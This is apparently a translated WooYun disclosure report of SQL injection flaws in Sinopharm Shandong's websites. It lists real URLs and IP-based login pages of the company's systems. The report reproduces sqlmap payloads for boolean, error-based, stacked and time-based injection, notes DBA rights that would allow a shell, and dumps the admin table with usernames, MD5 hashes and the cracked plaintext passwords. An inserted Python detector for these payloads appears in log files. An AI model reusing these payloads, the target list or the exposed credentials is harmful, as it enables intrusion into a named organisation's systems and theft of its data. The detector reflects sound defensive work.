
Vulnerability Summary

Defect ID: wooyun-2015-0165869

Title: n SQL injections at a Sinopharm (国药集团) company, bundled / millions of records / DBA privileges allow a shell / multiple sites affected

Affected vendor: Sinopharm (国药集团)

Author: 路人甲

Submitted: 2015-12-30 10:37

Fixed: 2016-01-22 11:14

Published: 2016-01-22 11:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-30: Details reported to the vendor; awaiting vendor handling
2015-12-30: Vendor confirmed; details visible to the vendor only
2016-01-09: Details disclosed to core white hats and domain experts
2016-01-19: Details disclosed to regular white hats
2016-01-29: Details disclosed to intern white hats
2016-01-22: Details disclosed to the public

Brief description:

Detailed description:

Target: Sinopharm Shandong Co., Ltd. (国药集团山东有限公司)
Sites hosted on the same server:
Main site: http://www.sinopharm-sd.com
Sinopharm Holding online ordering system: http://58.56.60.68:8009/websale/empLogin.aspx
OA system: http://58.56.60.68:8088/yyoa/index.jsp
Supplier portal: http://58.56.60.68/lxcx/tc_ghs_login.asp
Electronic prescription query system: http://58.56.60.68/EYJ/querychkrpt.aspx
There is no end of injection points:
http://www.sinopharm-sd.com/News.aspx?smallclassid=1
http://www.sinopharm-sd.com/About.aspx?smallclassid=8
http://www.sinopharm-sd.com/Tel.aspx?smallclassid=5
http://www.sinopharm-sd.com/Contact.aspx?smallclassid=14
http://www.sinopharm-sd.com/Map.aspx?smallclassid=19
http://www.sinopharm-sd.com/Yingpin.aspx?ID=13
http://www.sinopharm-sd.com/MedicinePage.aspx?smallclassid=40
http://www.sinopharm-sd.com/ifxinxi.aspx?cityid=2
Let's look at one of them: http://www.sinopharm-sd.com/News.aspx?smallclassid=1
The database user has DBA privileges, so a shell could be obtained.

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: smallclassid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: smallclassid=1' AND 3824=3824 AND 'smgD'='smgD
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: smallclassid=1' AND 8739=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(120)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (8739=8739) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113))) AND 'rBIx'='rBIx
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: smallclassid=1';WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: smallclassid=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'db_gykg'
current user is DBA: True
available databases [10]:
[*] db_gykg
[*] EasyUiDB
[*] gksd_ghslx
[*] master
[*] model
[*] msdb
[*] mytest
[*] plusoft_test
[*] PresAudi_20100428
[*] tempdb
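Added example (not part of the report): a small Python detector that flags the three injection shapes sqlmap reported above (boolean-based, error-based CONVERT/CHAR, and WAITFOR DELAY) when they appear in web server access logs. The log lines are constructed, and the IIS W3C field layout (date, time, method, page, query, status) is an assumption.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C-style log lines (not taken from the report); the query
# strings mirror the payload shapes sqlmap reported for the smallclassid parameter.
SAMPLE_LOG = """\
2015-12-30 02:10:01 GET /News.aspx smallclassid=1 200
2015-12-30 02:10:03 GET /News.aspx smallclassid=1'+AND+3824%3D3824+AND+'smgD'%3D'smgD 200
2015-12-30 02:10:05 GET /News.aspx smallclassid=1'+AND+8739%3DCONVERT(INT,(SELECT+CHAR(113)%2BCHAR(106)))+AND+'rBIx'%3D'rBIx 500
2015-12-30 02:10:11 GET /News.aspx smallclassid=1'%3BWAITFOR+DELAY+'0:0:5'-- 200
2015-12-30 02:10:12 GET /About.aspx smallclassid=8 200
"""

# Each rule is named after the sqlmap technique it corresponds to in the report.
RULES = [
    ("boolean-based blind", re.compile(r"'\s*AND\s+\d+\s*=\s*\d+", re.I)),
    ("error-based (CONVERT/CHAR)", re.compile(r"CONVERT\s*\(\s*INT\s*,.*CHAR\s*\(", re.I | re.S)),
    ("stacked / time-based (WAITFOR DELAY)", re.compile(r"WAITFOR\s+DELAY", re.I)),
]

def scan_iis_log(text: str):
    """Return (page, parameter, technique) for every request whose query string
    matches one of the injection shapes. The query is URL-decoded first: IIS logs
    it encoded, so a raw match would miss '%3D' standing in for '='."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue  # assumed layout: date time method page query status
        page, query = parts[3], unquote_plus(parts[4])
        param = query.split("=", 1)[0]
        for name, rx in RULES:
            if rx.search(query):
                hits.append((page, param, name))
                break  # report the first matching technique per request
    return hits

if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(hit)
```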


Let's look at the database:

Database: db_gykg
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| dbo.article | 39 |
| dbo.smallclass | 38 |
| dbo.products | 24 |
| dbo.bigclass | 23 |
| dbo.site | 18 |
| dbo.Sys_City | 18 |
| dbo.resume | 12 |
| dbo.partner | 8 |
| dbo.link | 6 |
| dbo.recruitment | 6 |
| dbo.sys_pic | 6 |
| dbo.admin | 5 |
| dbo.viewnews | 4 |
| dbo.Viewnewsbyorder | 4 |
| dbo.sys_style | 3 |
| dbo.userhy | 3 |
| dbo.admintype | 2 |
| dbo.Message | 2 |
+---------------------+---------+


Table: admin
[8 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| admincity | int |
| logintime | datetime |
| order | int |
| password | nvarchar |
| roles | varchar |
| userid | int |
| username | nvarchar |
| usertype | nvarchar |
+-----------+----------+
Database: db_gykg
Table: admin
[4 entries]
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| userid | roles | order | username | usertype | password | admincity | logintime |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+
| 1 | 1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17,18,19,32,33,40, | <blank> | admin | 0 | 21232F297A57A5A743894A0E4A801FC3 (admin) | 0 | NULL |
| 8 | 20,21,22,23,24,25,26,27,43, | <blank> | jnadmin | 0 | 2646419C347F33F3B8D6DB98B1B94A07 (jnadmin) | 1 | NULL |
| 9 | 28, | <blank> | qdadmin | 0 | 218E14D0D206162F8875D50D519F62CF (qdadmin) | 2 | NULL |
| 10 | 35,36,37,38,39,41, | <blank> | ytadmin | 0 | 56EAB79040880107388A006E71192600 (ytadmin) | 5 | NULL |
+--------+---------------------------------------------------------+---------+----------+----------+--------------------------------------------+-----------+-----------+


Now for the large data volumes.

Database: gksd_ghslx
+------------------+---------+
| Table | Entries |
+------------------+---------+
| dbo.TC_ghslx_mx | 4043799 |
| dbo.user_log | 1040537 |
| dbo.TC_ghsrk_mx | 725890 |
| dbo.yh_lxpz | 43231 |
| dbo.TC_kh | 40545 |
| dbo.TC_kcqd | 24471 |
| dbo.ypxx | 16298 |
| dbo.yhxx | 1846 |
| dbo.yh_group_not | 996 |
| dbo.yh_group_r | 68 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.yhxx_ghs | 20 |
| dbo.dict_owner | 14 |
| dbo.TC_news | 13 |
| dbo.yh_group | 13 |
| dbo.admin_user | 2 |
+------------------+---------+

Proof of vulnerability:

Remediation:

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-12-30 11:11

Vendor reply:

We will fix it as soon as possible.

Latest status:

None yet

